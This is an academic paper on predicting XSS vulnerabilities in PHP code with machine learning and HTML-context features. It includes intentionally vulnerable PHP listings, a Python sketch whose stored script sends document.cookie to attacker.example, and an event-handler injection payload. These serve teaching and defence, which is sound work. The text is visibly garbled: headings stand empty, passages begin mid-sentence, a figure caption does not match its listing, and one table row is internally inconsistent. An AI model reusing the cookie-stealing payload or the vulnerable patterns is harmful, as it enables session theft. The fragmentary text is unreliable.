Keywords: web application security, cross-site scripting vulnerability, machine learning, context-sensitive, input validation
I. INTRODUCTION
II.
In this section, we describe cross-site scripting vulnerabilities and discuss the limitations of existing related approaches,
which motivate this work.
A. Cross-Site Scripting Vulnerabilities
Cross-site scripting (XSS) is an application-level code-injection security vulnerability. It occurs whenever a
server program (i.e., a dynamic web page) uses unrestricted
input from an HTTP request, database, or file in its response
without any validation. It allows a malicious user to steal
sensitive information (e.g., cookies, session identifiers) and perform other
malicious operations. Figure 1 illustrates the sequence
of steps in a stored XSS attack. Initially,
the malicious user uses the comment form of a blog site to insert
and store malicious scripts in the site database. Then, a
legitimate user sends an HTTP request to the site to view the
latest comments. The site returns the stored comments, along
with the scripts, in its response. Finally, the legitimate user's
browser executes the scripts and sends the user's sensitive
information to the attacker's server.
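The stored XSS sequence described above can be illustrated with a minimal sketch. It is written in Python for brevity rather than in the PHP of the analysed applications; the in-memory comment list, the function names, and the attacker URL are all hypothetical, and `html.escape` stands in for an HTML-body escaper.

```python
import html

# Hypothetical in-memory "database" of blog comments (illustration only).
comments = []


def store_comment(text):
    """Store a comment exactly as submitted, without any validation."""
    comments.append(text)


def render_comments(escape):
    """Build the HTML fragment that the site returns to a visitor."""
    items = []
    for text in comments:
        body = html.escape(text) if escape else text
        items.append("<li>" + body + "</li>")
    return "<ul>" + "".join(items) + "</ul>"


# Step 1: the malicious user submits a script through the comment form.
store_comment(
    "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
)

# Steps 2-3: a legitimate user requests the comments; the stored script is
# echoed back unchanged, so the browser would execute it.
unsafe_page = render_comments(escape=False)

# With HTML-body escaping, the same stored input is rendered as inert text.
safe_page = render_comments(escape=True)

print(unsafe_page)
print(safe_page)
```

Escaping at output time is sufficient here only because the input lands in an HTML body context; other contexts need different filters.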
Fig. 1.
1. <html>
2. <body>
3. <?php
   // accept and store user input in a variable
4. $user_input = $_GET['UserData'];
   // use of user input in HTML tag attribute name
5. echo "<div " . $user_input . "= bob />";
   // use of user input in HTML tag name
6. echo "<" . $user_input . " href= \"/bob\" />";
   // use of user input in HTML tag body section
7. echo $user_input;
   // use of user input in double-quoted attribute value
8. echo "<div id=\"" . $user_input . "\">text</div>";
   // use of user input in unquoted attribute value
9. echo "<div id=" . $user_input . ">content</div>";
10. echo "<a href ='" . $user_input . "'>click</a>";
   // use of user input in single-quoted event handler
11. echo "<div onmouseover=\"x='" . $user_input . "\"\>";
   // use of user input to change text color dynamically
12. echo "<span style=color:" .
    htmlspecialchars($user_input) . ">welcome</span>";
   // presence of user input in HTML comment block
13. <!-- <?php echo $user_input; ?> -->
   // use of user input in script block
14. <script>
    <?php $user_input = $_POST['UserData'];
    $user_input = intval($user_input); echo $user_input; ?>
    </script>
15. ?>
16. </body> </html>
fails to prevent XSS attacks in such a scenario. Similarly, user input referenced in the comment block, JavaScript block, and
body_anchor_NQ_Attr_Val context in statements 13, 11, and 10,
respectively, requires special context-sensitive filters to avoid
XSS vulnerabilities. In [8], the authors used a pattern-matching
technique to identify the HTML context and the ESAPI
escaping library to mitigate XSS vulnerabilities in Java-based
web applications. Saxena et al. (2011) [9] pointed out
that context-mismatched sanitization and inconsistent multiple
sanitization require fundamental changes in the approach
to detecting XSS vulnerabilities. Alternatively, in [7],
the authors showed that text-mining-based machine
learning models provide probabilistic indications of vulnerable
source code segments. This saves developers time and effort
by letting them concentrate on the code segments predicted to be
vulnerable.
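A small sketch can make the context-mismatch problem concrete. It uses Python's `html.escape` as a stand-in for PHP's `htmlspecialchars` (an assumption made only for illustration), and the function names and payload are hypothetical. The payload contains none of the characters that an HTML-body escaper rewrites, so it passes through unchanged; in an unquoted attribute value, as in statement 9 of the listing, it then introduces a new event-handler attribute.

```python
import html


def render_unquoted_attr(user_input):
    """Escaped input placed in an unquoted attribute value (context mismatch)."""
    return "<div id=" + html.escape(user_input) + ">content</div>"


def render_quoted_attr(user_input):
    """The same escaper, but the attribute value is wrapped in double quotes."""
    return '<div id="' + html.escape(user_input) + '">content</div>'


# No <, >, &, or quote characters: the escaper has nothing to rewrite.
payload = "x onmouseover=alert(1)"

unquoted = render_unquoted_attr(payload)
quoted = render_quoted_attr(payload)

print(unquoted)  # the space ends the id value, so onmouseover becomes an attribute
print(quoted)    # the whole payload stays inside the quoted id value
```

The same escaping routine is therefore adequate in one output context and ineffective in another, which is why the context of the output statement is worth capturing as a feature.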
III. RELATED WORK
TABLE I.
Authors | Features | Applications | Source code language / Identified vulnerabilities | Machine-learning algorithms | Performance
Shin et al. (2011) [3] | Code complexity, code churn, and developer activity metrics | Mozilla Firefox web browser, Red Hat Enterprise Linux kernel | C++ / General vulnerabilities | Logistic regression, J48, Random forest, NB, Bayesian network | Recall: 80%
Chowdhury et al. (2011) [4] | Code complexity, coupling, and cohesion metrics | Mozilla Firefox web browser | C++ / General vulnerabilities | Logistic regression, C4.5, Random forest, NB | Precision: 4%, Recall: 74%, Accuracy: 73%, F1 measure: 73%
Shar et al. (2013) [6]; Shar et al. (2013) [10] | - | PHP web applications; PHP web applications | - | Logistic regression, MLP | Recall: >78%, Pf: <6%; Recall: 86%, Pf: 3%
Hovsepyan et al. (2012) [11] | Unique words | K9 mail client application | - | SVM | Accuracy: 87%, Precision: 85%, Recall: 88%
Roccardo et al. (2014) [7] | Unique words and Uni_tokens | Java application and Drupal CMS | - | Decision Trees, k-Nearest Neighbour, NB, Random Forest, and SVM | Recall: 82%
Walden et al. (2014) [5] | - | phpMyAdmin, Moodle, and Drupal CMS | - | Random Forest | Recall: 80.5%, Accuracy: 75.4%
IV.
The proposed approach proceeds as follows. First, we extract user-input context features from the output statement. Then,
we extract basic features that represent the characteristics of
input, output, and validation and sanitization routines through
the PHP tokenizing process. Next, we construct a feature set
by combining the basic and context features. Finally, we use various machine-learning algorithms to build prediction
models. Figure 3 depicts the steps, which are followed in the
Input: A string S that contains HTML code, and the block context TypeB
Output: Context of user input in the output statement
TypeS = a variable representing the user-input context
if (a complete HTML tag is present in S) then
    return TypeB;
else if (S starts with < and ends with =" | =' | =) then
    % BLOCK 1 %
    if (a special tag (i.e., a | style | script) appears just after < in S) then
        if (any event handler (e.g., onload) is present in S) then
            TypeS = TypeB + Event_Attr_Value + (DQ|SQ|NQ);
            return TypeS;
        else
            TypeS = TypeB + STag_Attr_Value + (DQ|SQ|NQ);
            return TypeS;
        end if
    else
        % a special tag is not present just after the opening < %
        if (any event handler (e.g., onload) is present in S) then
            TypeS = TypeB + Tag_Event_Attr_Val + (DQ|SQ|NQ);
            return TypeS;
        else if (any style is present in S) then
            TypeS = TypeB + Tag_CSS_Attr_Val + (DQ|SQ|NQ);
            return TypeS;
        end if
    end if
else if (S == <Non_special_tag) then
    % BLOCK 2 %
    TypeS = TypeB + Attr_Name;
    return TypeS;
else if (S == <) then
    % BLOCK 3 %
    TypeS = TypeB + Tag_Name;
    return TypeS;
else
    return TypeB;
end if
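The context-identification procedure above can be sketched in Python as follows. This is one possible reading, not the authors' implementation: the regular expressions, the function names, and the use of `_` to join label parts are assumptions, the "ends with" test is read as `="`, `='`, or `=` (matching DQ, SQ, and NQ), and the case the procedure leaves open (an attribute value with neither an event handler nor a style) falls back to the block context.

```python
import re

SPECIAL_TAGS = ("a", "style", "script")

# Hypothetical patterns approximating the checks named in the procedure.
COMPLETE_TAG = re.compile(r"<[^<>]*>")
SPECIAL_START = re.compile(r"^<(?:a|style|script)\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
STYLE_ATTR = re.compile(r"\bstyle\s*=", re.IGNORECASE)
OPEN_TAG_ONLY = re.compile(r"^<([A-Za-z][A-Za-z0-9]*)\s+$")


def quote_kind(s):
    """Return DQ, SQ, or NQ when s ends where an attribute value begins."""
    if s.endswith('="'):
        return "DQ"
    if s.endswith("='"):
        return "SQ"
    if s.endswith("="):
        return "NQ"
    return None


def user_input_context(s, block_type):
    """Classify the context of user input that directly follows fragment s."""
    s = s.lstrip()
    if COMPLETE_TAG.search(s):
        return block_type
    quote = quote_kind(s)
    if s.startswith("<") and quote is not None:
        # BLOCK 1: input is used as an attribute value.
        has_event = EVENT_HANDLER.search(s) is not None
        if SPECIAL_START.match(s):
            name = "Event_Attr_Value" if has_event else "STag_Attr_Value"
            return "_".join((block_type, name, quote))
        if has_event:
            return "_".join((block_type, "Tag_Event_Attr_Val", quote))
        if STYLE_ATTR.search(s):
            return "_".join((block_type, "Tag_CSS_Attr_Val", quote))
        return block_type  # assumption: case not covered by the procedure
    match = OPEN_TAG_ONLY.match(s)
    if match and match.group(1).lower() not in SPECIAL_TAGS:
        # BLOCK 2: input is used as an attribute name.
        return block_type + "_Attr_Name"
    if s == "<":
        # BLOCK 3: input is used as a tag name.
        return block_type + "_Tag_Name"
    return block_type


print(user_input_context("<div onmouseover=\"x='", "HTML_Element"))
print(user_input_context("<a href='", "HTML_Element"))
```

The argument `s` is the HTML text that precedes the user input within the output statement, for example the string literal before the concatenated variable in an `echo` statement.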
B. Example
The features extracted by the proposed feature extraction
approach can be explained as follows. Consider the source
code statements given in Figure 4. In this code, statements
3-6, 9-11, and 16-18 are present in the HTML element, comment,
and script blocks, respectively. The proposed approach extracts
the HTML_ELEMENT, Comment, and Script block contexts and
then tokenizes the code statements of each block to build the feature set.
The extracted features corresponding to the given source code
are presented in Table II. The text-mining-based prediction
approach [7] tokenizes the source code and considers PHP
tokens as features. In that approach, user-defined variable
names are treated as distinct features, although they are not useful
from a vulnerability point of view. Also, the T_STRING feature
is used for all strings (e.g., ENT_QUOTES, htmlspecialchars, etc.) in their feature set. However, ENT_QUOTES
is a parameter and htmlspecialchars is a sanitization function
in PHP, yet both are placed in the same category.
1. <html> <body>
2. <?php
3. $data = $_GET['Data'];
4. echo $data;
5. echo "<div id=\"" . $data . "\">content</div>";
6. echo "<div onmouseover=\"x='" . $data . "\"\>"; ?>
7. <!--
8. <?php
9. $data = $_GET['Data'];
10. $data = intval($data);
11. echo $data;
12. ?>
13. -->
14. <script>
15. <?php
16. $data = $_GET['Data'];
17. $data = intval($data);
18. echo $data;
19. ?>
20. </script>
21. </body> </html>
Fig. 4. XSS Vulnerable Source Code Statements that require Context-Sensitive Sanitization
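The block-context tagging described in this example can be sketched as follows. The sketch assumes the PHP statements have already been tokenized into (token type, text) pairs, for instance with PHP's tokenizer; the `SUPERGLOBALS` set, the function names, and the choice of which tokens to keep are hypothetical simplifications. Unlike a plain token stream, it keeps the name behind a T_STRING token (so `intval` and `ENT_QUOTES` remain distinct) and collapses user-defined variable names into a single T_VARIABLE feature.

```python
# Hypothetical set of input sources that keep their own name as a feature.
SUPERGLOBALS = {"$_GET", "$_POST", "$_COOKIE", "$_REQUEST"}


def basic_feature(token_type, text):
    """Map one PHP token to a basic feature name, or None to ignore it."""
    if token_type == "T_VARIABLE":
        # User-defined variable names carry no vulnerability information.
        return text if text in SUPERGLOBALS else "T_VARIABLE"
    if token_type == "T_STRING":
        # Keep the function or constant name instead of the generic T_STRING.
        return text
    if token_type == "T_ECHO":
        return "T_ECHO"
    return None  # punctuation and other tokens are skipped in this sketch


def line_features(tokens, block_context):
    """Suffix every retained basic feature with the block context."""
    features = []
    for token_type, text in tokens:
        name = basic_feature(token_type, text)
        if name is not None:
            features.append(name + "_" + block_context)
    return features


# Statement 17 of Fig. 4: $data = intval($data); inside the script block.
statement_17 = [
    ("T_VARIABLE", "$data"), ("=", "="), ("T_STRING", "intval"),
    ("(", "("), ("T_VARIABLE", "$data"), (")", ")"), (";", ";"),
]
print(line_features(statement_17, "script_block"))
```

The same `intval` call would yield `intval_comment_block` inside an HTML comment, which is how identical code in different blocks ends up with different features.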
TABLE II.
Code Line | Proposed context features | PHP tokens [7]
1 | - | -
2 | - | -
3 | T_VARIABLE_HTML_Element, $_GET_HTML_Element | -
4 | T_ECHO_HTML_Element, T_VARIABLE_HTML_Element | -
5 | T_ECHO_HTML_Element, HTML_Element_H_TAG_DQ_Attr_Val, T_VARIABLE_HTML_Element | -
6 | T_ECHO_HTML_Element, HTML_Element_HTAG_Event_DQ_Attr_Val, T_VARIABLE_HTML_Element | T_ECHO, ., T_VARIABLE($data), ., ;
7 | - | T_INLINE_HTML
8 | - | T_OPEN_TAG
9 | T_VARIABLE_comment_block, $_GET_comment_block | T_VARIABLE($data), =, T_VARIABLE($_GET), [, ], ;
10 | T_VARIABLE_comment_block, $_GET_comment_block, T_VARIABLE_comment_block | T_VARIABLE($data), =, T_STRING, (, T_VARIABLE($data), ), ;
11 | T_ECHO_comment_block, T_VARIABLE_comment_block | T_ECHO, T_VARIABLE($data)
12 | - | T_CLOSE_TAG
13 | - | T_INLINE_HTML
14 | - | -
15 | - | T_OPEN_TAG
16 | T_VARIABLE_script_block, $_GET_script_block | T_VARIABLE($data), =, T_VARIABLE($_GET), [, ], ;
17 | T_VARIABLE_script_block, intval_script_block, T_VARIABLE_script_block | T_VARIABLE($data), =, T_STRING, (, T_VARIABLE($data), ), ;
18 | T_VARIABLE_script_block, T_VARIABLE_script_block | T_ECHO, T_VARIABLE($data), ;
19 | - | T_CLOSE_TAG
20 | - | T_INLINE_HTML
VI.
A. Experimental Setting:
The 10-fold cross-validation technique is used to evaluate
the performance of the proposed approach. We randomly
divide the dataset into 90% training and 10% testing programs such that the two sets are disjoint. We repeat all
the experiments 10 times with randomly selected training and
testing sets, and report the final performance as the average of
the results.
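The evaluation protocol as described here (ten random, disjoint 90%/10% splits with the scores averaged) can be sketched as follows. Strictly, k-fold cross-validation partitions the data once into k folds; this sketch follows the random-split wording of the text instead. The function names, the fixed seed, and the toy majority-class scorer are hypothetical placeholders for a real learner and measure.

```python
import random


def repeated_holdout(samples, labels, train_and_score,
                     repeats=10, test_fraction=0.1, seed=0):
    """Average a score over repeated random, disjoint train/test splits."""
    rng = random.Random(seed)
    indices = list(range(len(samples)))
    n_test = max(1, round(len(indices) * test_fraction))
    scores = []
    for _ in range(repeats):
        rng.shuffle(indices)
        # Disjoint by construction: each index lands in exactly one slice.
        test_idx, train_idx = indices[:n_test], indices[n_test:]
        train = [(samples[i], labels[i]) for i in train_idx]
        test = [(samples[i], labels[i]) for i in test_idx]
        scores.append(train_and_score(train, test))
    return sum(scores) / len(scores)


def majority_baseline(train, test):
    """Toy scorer: predict the most common training label, return accuracy."""
    train_labels = [label for _, label in train]
    majority = max(set(train_labels), key=train_labels.count)
    return sum(1 for _, label in test if label == majority) / len(test)


samples = list(range(100))
labels = [1] * 70 + [0] * 30
print(repeated_holdout(samples, labels, majority_baseline))
```

Passing the scorer as a function keeps the splitting logic independent of the classifier, so the same loop can be reused for each learning algorithm that is compared.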
3808 unsafe samples that are organized into different categories. The proposed methods are evaluated on
this dataset, as it covers most of the cases required for XSS
vulnerability prediction. The dataset is freely available and open source, and contains a set of PHP source code files with their vulnerability labels. It also contains object-oriented
source code, which helps to evaluate the performance of
the proposed methods on object-oriented code. This dataset is
better suited than other existing datasets for evaluating the
proposed approaches. Other existing vulnerability
repositories include Bugzilla, CVE, and NVD. These contain only
vulnerability information and do not provide the source code needed to
extract vulnerability prediction features. Therefore, they are
inadequate for evaluating our proposed approach. The NIST
(National Institute of Standards and Technology) dataset is also
publicly available for evaluating vulnerability prediction methods,
but it contains only a limited number of PHP source code samples (i.e.,
80), which is insufficient to build an effective machine learning
model.
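The evaluation measures reported in Table III (precision, recall, F1-measure, and accuracy) follow the standard definitions over a confusion matrix, sketched below. The function names and the example counts are hypothetical; the final lines recompute the F1-measure from precision and recall values taken from the proposed-approach rows of Table III as a consistency check.

```python
def prediction_measures(tp, fp, tn, fn):
    """Precision, recall, F1-measure, and accuracy from confusion-matrix counts."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    accuracy = (tp + tn) / (tp + fp + tn + fn)
    return precision, recall, f1, accuracy


def f1_from(precision, recall):
    """F1-measure as the harmonic mean of precision and recall."""
    return 2 * precision * recall / (precision + recall)


# Hypothetical counts: 40 true positives, 10 false positives,
# 40 true negatives, 10 false negatives.
print(prediction_measures(40, 10, 40, 10))

# Precision and recall (in %) for SVM and NB with the proposed features.
print(round(f1_from(88.7, 83.2), 1))
print(round(f1_from(67.8, 47.0), 1))
```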
TABLE III. EVALUATION OF XSS VULNERABILITY PREDICTION
Approach | Measure (%) | SVM | NB | Bagging | Random Forest | J48 | JRip
F1 (Walden Features) | Precision | 66.2 | 59.6 | 67.1 | 64.7 | 67.8 | 65.6
F1 (Walden Features) | Recall | 57.6 | 39.4 | 56.9 | 53.7 | 56.8 | 53
F1 (Walden Features) | F1-measure | 61.6 | 47.5 | 61.6 | 58.7 | 61.8 | 58.6
F1 (Walden Features) | Accuracy | 70.9 | 64.7 | 71.3 | 69.4 | 71.6 | 69.7
F2 (Proposed Approach) | Precision | 88.7 | 67.8 | 93.4 | 86.9 | 92.9 | 99.2
F2 (Proposed Approach) | Recall | 83.2 | 47 | 88 | 81.6 | 86.9 | 60
F2 (Proposed Approach) | F1-measure | 85.9 | 55.5 | 90.6 | 84.2 | 89.8 | 74.8
F2 (Proposed Approach) | Accuracy | 88.9 | 69.5 | 92.6 | 87.6 | 92 | 83.6
ACKNOWLEDGEMENT
We thank James Walden, Associate Professor and Director
of the Center for Information Security, Northern Kentucky
University, for providing valuable insights and helpful suggestions on our paper. We also thank the management of Swami
Keshvanand Institute of Technology, Management & Gramothan,
Jaipur, Rajasthan, India, for their support and encouragement.
REFERENCES
[1] WhiteHat Security. Web statistics report. https://whitehatsec.com/categories/statistics-report, 2013. Accessed: 2013-06-26.
[2] Isatou Hydara, Abu Bakar Md. Sultan, Hazura Zulzalil, and Novia
Admodisastro. Current state of research on cross-site scripting (XSS): a
systematic literature review. Information and Software Technology,
58:170-186, 2015.
[3] Yonghee Shin, A. Meneely, L. Williams, and J.A. Osborne. Evaluating
complexity, code churn, and developer activity metrics as indicators of
software vulnerabilities. IEEE Transactions on Software Engineering,
37(6):772-787, Nov 2011.